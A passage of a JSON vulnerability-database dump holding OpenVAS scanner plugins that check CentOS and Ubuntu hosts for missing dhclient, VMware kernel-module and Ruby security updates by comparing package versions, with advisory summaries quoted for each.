WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-July/016034.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880710\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1154\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_name(\"CentOS Update for dhclient CESA-2009:1154 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dhclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS3\");\n script_tag(name:\"affected\", value:\"dhclient on CentOS 3\");\n script_tag(name:\"insight\", value:\"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n The Mandriva Linux Engineering Team discovered a stack-based buffer\n overflow flaw in the ISC DHCP client. If the DHCP client were to receive a\n malicious DHCP response, it could crash or execute arbitrary code with the\n permissions of the client (root). (CVE-2009-0692)\n\n An insecure temporary file use flaw was discovered in the DHCP daemon's\n init script ('/etc/init.d/dhcpd'). A local attacker could use this flaw to\n overwrite an arbitrary file with the output of the 'dhcpd -t' command via\n a symbolic link attack, if a system administrator executed the DHCP init\n script with the 'configtest', &'restart', or 'reload' option.\n (CVE-2009-1893)\n\n Users of DHCP should upgrade to these updated packages, which contain\n backported patches to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:28:17", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-543-1", "cvss3": {}, "published": "2009-03-23T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-restricted-modules-2.6.17/20, vmware-player-kernel-2.6.15 vulnerabilities USN-543-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062", "CVE-2007-4497", "CVE-2007-4496", "CVE-2007-0063", "CVE-2007-0061"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840135", "href": "http://plugins.openvas.org/nasl.php?oid=840135", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_543_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for linux-restricted-modules-2.6.17/20, vmware-player-kernel-2.6.15 vulnerabilities USN-543-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Neel Mehta and Ryan Smith discovered that the VMWare Player DHCP server\n did not correctly handle certain packet structures. Remote attackers\n could send specially crafted packets and gain root privileges.\n (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\n\n Rafal Wojtczvk discovered multiple memory corruption issues in VMWare\n Player. Attackers with administrative privileges in a guest operating\n system could cause a denial of service or possibly execute arbitrary\n code on the host operating system. (CVE-2007-4496, CVE-2007-4497)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-543-1\";\ntag_affected = \"linux-restricted-modules-2.6.17/20, vmware-player-kernel-2.6.15 vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 6.10 ,\n Ubuntu 7.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-543-1/\");\n script_id(840135);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"543-1\");\n script_cve_id(\"CVE-2007-0061\", \"CVE-2007-0062\", \"CVE-2007-0063\", \"CVE-2007-4496\", \"CVE-2007-4497\");\n script_name( \"Ubuntu Update for linux-restricted-modules-2.6.17/20, vmware-player-kernel-2.6.15 vulnerabilities USN-543-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"avm-fritz-kernel-source\", ver:\"3.11+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fglrx-kernel-source\", ver:\"8.34.8+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-restricted-modules\", ver:\"2.6.20-16-lowlatency_2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-legacy-dev\", ver:\"1.0.7184+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-legacy\", ver:\"1.0.7184+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-kernel-source\", ver:\"1.0.9631+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-legacy-kernel-source\", ver:\"1.0.7184+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"avm-fritz-firmware\", ver:\"2.6.20-16_3.11+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fglrx-control\", ver:\"8.34.8+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-restricted-modules\", ver:\"2.6.20-16-386_2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-restricted-modules\", ver:\"2.6.20-16-generic_2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-dev\", ver:\"1.0.9631+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-new-dev\", ver:\"1.0.9755+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-new\", ver:\"1.0.9755+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx\", ver:\"1.0.9631+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-new-kernel-source\", ver:\"1.0.9755+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vmware-player-kernel-modules\", ver:\"2.6.20-16_2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vmware-server-kernel-modules\", ver:\"2.6.20-16_2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vmware-tools-kernel-modules\", ver:\"2.6.20-16_2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xorg-driver-fglrx-dev\", ver:\"7.1.0-8.34.8+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xorg-driver-fglrx\", ver:\"7.1.0-8.34.8+2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-restricted-modules-common\", ver:\"2.6.20.6-16.30\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"vmware-player-kernel-modules\", ver:\"2.6.15-29_2.6.15.11-13\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vmware-player-kernel-modules\", ver:\"2.6.15.11-13\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vmware-player-kernel-source\", ver:\"2.6.15.11-13\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"avm-fritz-kernel-source\", ver:\"3.11+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fglrx-kernel-source\", ver:\"8.28.8+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-legacy-dev\", ver:\"1.0.7184+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-legacy\", ver:\"1.0.7184+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-kernel-source\", ver:\"1.0.8776+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-legacy-kernel-source\", ver:\"1.0.7184+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"avm-fritz-firmware\", ver:\"2.6.17-12_3.11+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fglrx-control\", ver:\"8.28.8+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-restricted-modules\", ver:\"2.6.17-12-386_2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-restricted-modules\", ver:\"2.6.17-12-generic_2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx-dev\", ver:\"1.0.8776+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nvidia-glx\", ver:\"1.0.8776+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vmware-player-kernel-modules\", ver:\"2.6.17-12_2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xorg-driver-fglrx-dev\", ver:\"7.1.0-8.28.8+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xorg-driver-fglrx\", ver:\"7.1.0-8.28.8+2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-restricted-modules-common\", ver:\"2.6.17.9-12.4\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:15", "description": "The remote host is missing an update to ruby1.9\nannounced via advisory USN-805-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-805-1 (ruby1.9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062", "CVE-2009-1904", "CVE-2009-2469", "CVE-2009-1892", "CVE-2008-5616", "CVE-2009-2464", "CVE-2009-0642", "CVE-2009-0159", "CVE-2009-2472", "CVE-2009-2467", "CVE-2009-2463", "CVE-2009-1391", "CVE-2009-2466", "CVE-2009-1189", "CVE-2009-1252", "CVE-2009-2462", "CVE-2009-2465"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64486", "href": "http://plugins.openvas.org/nasl.php?oid=64486", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_805_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_805_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-805-1 (ruby1.9)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libruby1.8 1.8.4-1ubuntu1.7\n ruby1.8 1.8.4-1ubuntu1.7\n\nUbuntu 8.04 LTS:\n libruby1.8 1.8.6.111-2ubuntu1.3\n ruby1.8 1.8.6.111-2ubuntu1.3\n\nUbuntu 8.10:\n libruby1.8 1.8.7.72-1ubuntu0.2\n libruby1.9 1.9.0.2-7ubuntu1.2\n ruby1.8 1.8.7.72-1ubuntu0.2\n ruby1.9 1.9.0.2-7ubuntu1.2\n\nUbuntu 9.04:\n libruby1.8 1.8.7.72-3ubuntu0.1\n libruby1.9 1.9.0.2-9ubuntu1.1\n ruby1.8 1.8.7.72-3ubuntu0.1\n ruby1.9 1.9.0.2-9ubuntu1.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-805-1\";\n\ntag_insight = \"It was discovered that Ruby did not properly validate certificates. An\nattacker could exploit this and present invalid or revoked X.509\ncertificates. (CVE-2009-0642)\n\nIt was discovered that Ruby did not properly handle string arguments that\nrepresent large numbers. An attacker could exploit this and cause a denial\nof service. (CVE-2009-1904)\";\ntag_summary = \"The remote host is missing an update to ruby1.9\nannounced via advisory USN-805-1.\";\n\n \n\n\nif(description)\n{\n script_id(64486);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0642\", \"CVE-2009-1904\", \"CVE-2009-1892\", \"CVE-2009-1391\", \"CVE-2009-1189\", \"CVE-2007-0062\", \"CVE-2008-5616\", \"CVE-2009-0159\", \"CVE-2009-1252\", \"CVE-2009-2462\", \"CVE-2009-2463\", \"CVE-2009-2464\", \"CVE-2009-2465\", \"CVE-2009-2466\", \"CVE-2009-2467\", \"CVE-2009-2469\", \"CVE-2009-2472\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-805-1 (ruby1.9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-805-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"irb1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-elisp\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-examples\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8-dbg\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-dev\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.8\", ver:\"1.8.4-1ubuntu1.7\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-elisp\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-examples\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8-dbg\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-dev\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.8\", ver:\"1.8.6.111-2ubuntu1.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-elisp\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-examples\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-elisp\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-examples\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8-dbg\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-dev\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.7.72-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9-dbg\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9\", ver:\"1.9.0.2-7ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-dev\", 